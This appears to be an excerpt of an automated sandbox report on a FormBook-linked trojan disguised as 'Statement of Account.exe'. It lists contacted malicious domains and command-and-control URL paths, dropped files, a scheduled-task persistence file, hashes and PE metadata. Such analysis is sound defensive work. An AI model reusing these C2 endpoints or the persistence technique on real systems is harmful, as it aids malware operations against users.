                                                                                                              http://www.fontbureau.com/designersGStatement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://www.srtio.xyzexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://www.urgaslotvip.website/cu29/www.nd-los.netexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://www.fontbureau.com/designers/?Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://www.founder.com.cn/cn/bTheStatement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://www.leachlondonstore.onlineexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://www.fontbureau.com/designers?Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000007.00000000.1738610372.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://powerpoint.office.comcemberexplorer.exe, 00000007.00000003.3106429388.000000000C5E1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4174883192.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1754971780.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
Name: http://www.ental-bridges-87553.bondReferer:
Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: http://www.f6b-crxy.top
Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: http://www.tiro.com
Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: http://www.goodfont.co.kr
Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.hopp9.top/cu29/www.ohns.app
Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: http://schemas.micro
Source: explorer.exe, 00000007.00000002.4170599485.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1750978352.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4170037093.0000000007F40000.00000002.00000001.00040000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.hopp9.top/cu29/
Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: http://www.eb777.club
Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: http://www.typography.netD
Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.galapagosdesign.com/staff/dennis.htm
Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.eb777.club/cu29/www.irex.info
Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.azino-forum-pro.online
Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: http://www.urgaslotvip.website/cu29/
Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://api.msn.com/q
Source: explorer.exe, 00000007.00000002.4171222123.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3108248750.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1743570907.00000000097D4000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.usinessaviationconsulting.netReferer:
Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: http://www.fonts.com
Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.irex.infoReferer:
Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: http://www.sandoll.co.kr
Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown
IP: 85.13.166.18
Domain: www.irex.info
Country: Germany
ASN: 34788
ASN Name: NMM-ASD-02742FriedersdorfHauptstrasse68DE
Malicious: true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1543876
Start date and time: 2024-10-28 15:33:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: Statement of Account.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@535/11@11/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 129
• Number of non-executed functions: 324
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: Statement of Account.exe
Time | Type | Description
10:34:00 | API Interceptor | 1x Sleep call for process: Statement of Account.exe modified
10:34:02 | API Interceptor | 18x Sleep call for process: powershell.exe modified
10:34:04 | API Interceptor | 1x Sleep call for process: SIZfuXT.exe modified
10:34:28 | API Interceptor | 8659033x Sleep call for process: explorer.exe modified
10:34:45 | API Interceptor | 7579714x Sleep call for process: NETSTAT.EXE modified
14:34:02 | Task Scheduler | Run new task: SIZfuXT path: C:\Users\user\AppData\Roaming\SIZfuXT.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
85.13.166.18 | New PO 127429.exe | malicious | FormBook | www.irex.info/cu29/?u6Zt=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZNgnCDylQV65J9tAeA==&kR-l=xP68RjTX
85.13.166.18 | Payment Reciept FL202306150003 Request 10273 Konturteile.exe | malicious | FormBook, PureLog Stealer | www.irex.info/cu29/?lv1DT=Y2Jlpvjp8x-0AHv&iBZlUlWP=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZNsnRT+mJF6v
85.13.166.18 | Request For PO-230102.bat.exe | malicious | FormBook | www.irex.info/cu29/?Dzr=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZNgedySmeDm+J9tHNw==&R2M=Gpg8ENjxBfvTXZ1

Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.irex.info | New PO 127429.exe | malicious | FormBook | 85.13.166.18
www.irex.info | RFQ 242024.exe | malicious | FormBook | 85.13.166.18
www.irex.info | Payment Reciept FL202306150003 Request 10273 Konturteile.exe | malicious | FormBook, PureLog Stealer | 85.13.166.18
www.irex.info | October 2024 PricesOffer Rates.bat.exe | malicious | FormBook | 85.13.166.18
www.irex.info | Request For PO-230102.bat.exe | malicious | FormBook | 85.13.166.18

Match | Associated Sample Name / URL | Detection | Threat Name | Context
NMM-ASD-02742FriedersdorfHauptstrasse68DE | New PO 127429.exe | malicious | FormBook | 85.13.166.18
NMM-ASD-02742FriedersdorfHauptstrasse68DE | nklarm7.elf | malicious | Unknown | 85.13.184.4
NMM-ASD-02742FriedersdorfHauptstrasse68DE | Payment Reciept FL202306150003 Request 10273 Konturteile.exe | malicious | FormBook, PureLog Stealer | 85.13.166.18
NMM-ASD-02742FriedersdorfHauptstrasse68DE | 4ui8luUSNp.exe | malicious | Coinhive, Xmrig | 85.13.166.174
NMM-ASD-02742FriedersdorfHauptstrasse68DE | Request For PO-230102.bat.exe | malicious | FormBook | 85.13.166.18
NMM-ASD-02742FriedersdorfHauptstrasse68DE | https://allegro-worxx.de/ | malicious | Unknown | 85.13.161.130
NMM-ASD-02742FriedersdorfHauptstrasse68DE | https://atpscan.global.hornetsecurity.com/?d=48cXMF0z7lMlWaR4-PlsbtUc8mFiMfFFndJRjEPuYtN-uYwWsyWxL5J5MR-Ug5CE&f=dme3IKUCx1CkAEFqHg7DwPw18BP_OQlvudnvuL33-Lpo64IRdbltM4_7BbS22Zf4&i=&k=uvEU&m=C-1BZKEYF-Cl5rwq0_FrWo_rnOtg9J2VjL7wG_KiYQ4zCmrhfgeCWZm7jI2FLiWiujyVfZXhjPSaNszUHd_-tPPbHZVMqnN_KxIKzjHidCoVjgDEgxtyWq50QMIznX31&n=msheiBXClL42beZAq-0MKeu_K3YWbf4RbFSWB4nMvrZjKHZvlfgqWpnAMmHJM8nOBGwYdLcEaXDrA0ElMeqJyA&r=qQoQsacw6FZ-pWCR9Ygk8d_uohNhiBjvfkDS9IBTRytjYPkbqiDbNjzjfMkGfqGW&s=c3334c9337ad200a046268dabfc48b0b462d8959b1985605036142fc4b1a8f81&u=https%3A%2F%2Fmqqaqm.clicks.mlsend.com%2Ftb%2Fc%2FeyJ2Ijoie1wiYVwiOjEwNjMxNTQsXCJsXCI6MTMxNjM1NDA2NzI2NzU5NjE3LFwiclwiOjEzMTYzNTQwNjk1MTE1NTExNX0iLCJzIjoiMWU0NDhhM2JiYjBjYmJmOSJ9 | malicious | Unknown | 85.13.157.247
NMM-ASD-02742FriedersdorfHauptstrasse68DE | https://immergut.dotling.com | malicious | Unknown | 85.13.165.204
NMM-ASD-02742FriedersdorfHauptstrasse68DE | firmware.armv4l.elf | malicious | Unknown | 85.13.147.130
NMM-ASD-02742FriedersdorfHauptstrasse68DE | firmware.armv5l.elf | malicious | Unknown | 85.13.147.130
No context
No context
Process: C:\Users\user\AppData\Roaming\SIZfuXT.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                Process:C:\Users\user\Desktop\Statement of Account.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1216
                                                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2232
                                                                                                                                                Entropy (8bit):5.380805901110357
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:lylWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMuge//ZMtUyus:lGLHxvCZfIfSKRHmOugras
                                                                                                                                                MD5:B69D4BCEB473BE2D80461590F6510392
                                                                                                                                                SHA1:C0F9556CCB243C3778C856E2A87C59EF846E2BDD
                                                                                                                                                SHA-256:8AF0F83277B74D0D2D6239993569D5635618D4900F2F446123E9399D6B6B9F74
                                                                                                                                                SHA-512:96A2D3B4157320EB2E2B53E8BEFE460B0E00E4851B09E07EACBA9B45309361D4C6A9C4E14C6E80CCE79EB0119C0550372FF80479DFA06CE35D819EEACCBD47BA
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Users\user\Desktop\Statement of Account.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1573
                                                                                                                                                Entropy (8bit):5.111648361188591
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta/Z+xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT8Qv
                                                                                                                                                MD5:D9267C09B27D61DE216C46C89908DF5F
                                                                                                                                                SHA1:744BC3909EE52F2A2333608ABEA100453B39FAC6
                                                                                                                                                SHA-256:7539F379DAF04EC305A4BD6FE8252DA2F2CAFBB557FA989A1C3F8694AC9B8F2F
                                                                                                                                                SHA-512:F580BB49AB7134759F5398B5D5AF8F963B3CB96855AC04C649DF83083DFA53E1C651100201CD759E2E9FF081CB46B367A1AA49FACF0AA6C2111C0D15F87E6F87
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\SIZfuXT.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1573
                                                                                                                                                Entropy (8bit):5.111648361188591
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta/Z+xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT8Qv
                                                                                                                                                MD5:D9267C09B27D61DE216C46C89908DF5F
                                                                                                                                                SHA1:744BC3909EE52F2A2333608ABEA100453B39FAC6
                                                                                                                                                SHA-256:7539F379DAF04EC305A4BD6FE8252DA2F2CAFBB557FA989A1C3F8694AC9B8F2F
                                                                                                                                                SHA-512:F580BB49AB7134759F5398B5D5AF8F963B3CB96855AC04C649DF83083DFA53E1C651100201CD759E2E9FF081CB46B367A1AA49FACF0AA6C2111C0D15F87E6F87
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                                Process:C:\Users\user\Desktop\Statement of Account.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):702976
                                                                                                                                                Entropy (8bit):7.784115992955648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:DjakOtXy9wBynnEBkRbsrli5VzgnaIwvBPmBaKcWDtQwBPaNi9a:Dj34Lo4kRbs5i3zgnVomBSwqCCi9
                                                                                                                                                MD5:D034873F3CA1528CD660316E6BBE8C14
                                                                                                                                                SHA1:BFD745B38033A3E3EE21BE7876D053EA20CC46EF
                                                                                                                                                SHA-256:0248B7BDBF6C49FFCEDDAE89725A94DA2C3076EBBF6253FAFD2C817B57DC5891
                                                                                                                                                SHA-512:DFE8C17EE1846F7F469BB51ACC42695734E2EEA555D1FBA81BC44A9686C4D9BB1D6F424EA156D2E15E4D8C002A4405F53719481AE875AA36FA9AD04ADF436B65
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                Process:C:\Users\user\Desktop\Statement of Account.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26
                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Entropy (8bit):7.784115992955648
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                File name:Statement of Account.exe
                                                                                                                                                File size:702'976 bytes
                                                                                                                                                MD5:d034873f3ca1528cd660316e6bbe8c14
                                                                                                                                                SHA1:bfd745b38033a3e3ee21be7876d053ea20cc46ef
                                                                                                                                                SHA256:0248b7bdbf6c49ffceddae89725a94da2c3076ebbf6253fafd2c817b57dc5891
                                                                                                                                                SHA512:dfe8c17ee1846f7f469bb51acc42695734e2eea555d1fba81bc44a9686c4d9bb1d6f424ea156d2e15e4d8c002a4405f53719481ae875aa36fa9ad04adf436b65
                                                                                                                                                SSDEEP:12288:DjakOtXy9wBynnEBkRbsrli5VzgnaIwvBPmBaKcWDtQwBPaNi9a:Dj34Lo4kRbs5i3zgnVomBSwqCCi9
                                                                                                                                                TLSH:9EE4016C171AD513CC920BB82EB1F2F82A3C6DDDE902D2525FDD6EFB7466E052E44182
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.g..............0..t...D........... ........@.. ....................... ............@................................
                                                                                                                                                Icon Hash:336dce8793686129
                                                                                                                                                Entrypoint:0x4a92a6
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
